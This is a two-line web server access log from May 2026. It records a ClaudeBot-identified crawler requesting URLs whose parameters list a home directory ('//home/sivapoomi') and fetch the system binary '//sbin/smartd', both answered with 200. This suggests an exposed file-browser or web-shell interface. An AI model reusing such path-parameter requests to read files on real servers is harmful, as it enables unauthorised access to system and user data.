216.73.217.176 - - [19/May/2026:13:10:22 +0100] "GET /?path=%2F%2Fhome%2Fsivapoomi HTTP/2" 200 2630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:10:25 +0100] "GET /?fileloc=%2F%2Fsbin%2Fsmartd&path=%2F%2Fsbin HTTP/2" 200 195167 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
